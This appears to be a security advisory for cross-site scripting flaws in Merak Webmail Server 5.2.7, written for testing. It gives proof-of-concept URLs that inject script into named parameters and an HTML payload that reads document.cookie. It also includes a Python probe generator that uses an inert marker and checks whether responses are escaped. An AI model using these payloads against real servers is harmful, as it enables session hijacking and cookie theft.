Vulnerability description:
```
Multiple cross-site scripting (XSS) vulnerabilities exist in Merak Webmail Server 5.2.7. A remote attacker can inject arbitrary web script or HTML via the category, cserver, ext, global, showgroups or showlite parameter to address.html; the spage or autoresponder parameter to settings.html; the folder parameter to readmail.html; the attachmentpage_text_error parameter to attachment.html; the folder, ct or cv parameter to calendar.html; tags; or an e-mail subject.
```
Test code (`[XSS]` stands for the test payload and `[id]` for the id value the webmail session carries in its URLs; the last line is an HTML payload for the stored vectors, i.e. tags and e-mail content):
```
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
/attachment.html?attachmentpage_text_error=">[XSS]
<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>
```
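The PoC URLs above inject a payload into one parameter at a time and rely on the tester to read the response. The following added example (not part of the original advisory or of Merak Webmail) generalises that into a small probe generator and reflection checker for every reflected parameter the description names: it builds one URL per parameter with a random, inert marker tag, then classifies a response body as reflecting the marker unescaped (vulnerable), entity-escaped (fixed) or not at all. The HTTP responses in the block are constructed to show the two outcomes and are not real server output; `[id]` is kept as the advisory's placeholder, and the baseline parameter values are assumptions taken from the PoC URLs. The stored vectors (tags, e-mail subject) are out of scope here because they need a mailbox to inspect rather than a GET response.

```python
"""Reflected-XSS probe builder and response checker for the Merak Webmail
5.2.7 parameters listed in the advisory above.

Added example, not code from the advisory or the product. Responses below
are constructed for the demo, not captured from a server.
"""
import html
import re
import secrets
from urllib.parse import urlencode

# Endpoint -> reflected parameters named in the advisory.
TARGETS = {
    "/address.html": ["category", "cserver", "ext", "global", "showgroups", "showlite"],
    "/settings.html": ["spage", "autoresponder"],
    "/readmail.html": ["folder"],
    "/attachment.html": ["attachmentpage_text_error"],
    "/calendar.html": ["folder", "ct", "cv"],
}

# Baseline values so each request stays well-formed. Taken from the PoC URLs;
# "[id]" is the advisory's placeholder for the session id and is left as-is.
BASE_PARAMS = {
    "/address.html": {"id": "[id]", "sort": "name", "selectsort": ""},
    "/settings.html": {"id": "[id]", "autoresponder": "1", "spage": "0"},
}


def make_marker() -> str:
    """Random tag name: unambiguous when reflected, executes nothing."""
    return "xss" + secrets.token_hex(4)


def payload_for(marker: str) -> str:
    """Same shape as the PoCs: close the attribute, then open a new tag."""
    return '"><' + marker + '>'


def build_probes(marker: str) -> list[tuple[str, str, str]]:
    """Return (path, parameter, url) with the payload in one parameter at a time."""
    probes = []
    for path, params in TARGETS.items():
        for target in params:
            query = dict(BASE_PARAMS.get(path, {}))
            for other in params:          # keep sibling parameters present but empty
                query.setdefault(other, "")
            query[target] = payload_for(marker)
            probes.append((path, target, path + "?" + urlencode(query)))
    return probes


def classify_reflection(body: str, marker: str) -> str:
    """'unescaped' = marker came back as a live tag (exploitable),
    'escaped'   = only entity-encoded copies present (safe),
    'absent'    = parameter not reflected at all."""
    if re.search(r'"><' + re.escape(marker) + r'>', body):
        return "unescaped"
    if html.escape(payload_for(marker)) in body or "&lt;" + marker + "&gt;" in body:
        return "escaped"
    return "absent"


# Constructed response fragments: how a 5.2.7-style page echoing the category
# value raw, and a corrected page escaping it, would look. Not real output.
def sample_vulnerable(marker: str) -> str:
    return f'<input type="hidden" name="category" value="{payload_for(marker)}">'


def sample_fixed(marker: str) -> str:
    return f'<input type="hidden" name="category" value="{html.escape(payload_for(marker))}">'


if __name__ == "__main__":
    m = make_marker()
    for path, param, url in build_probes(m):
        print(f"{path:18} {param:26} {url}")
    # In a live test the body would be the GET response for each url.
    print("vulnerable page:", classify_reflection(sample_vulnerable(m), m))
    print("fixed page:     ", classify_reflection(sample_fixed(m), m))
```

Run it against a real instance by fetching each generated URL with the session cookie and passing the body to `classify_reflection`; a marker that comes back as a live tag is exactly the condition the `"><script>alert()</script>` PoC relies on, while the random tag name keeps the probe from executing anything in the tester's own browser.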
No comments yet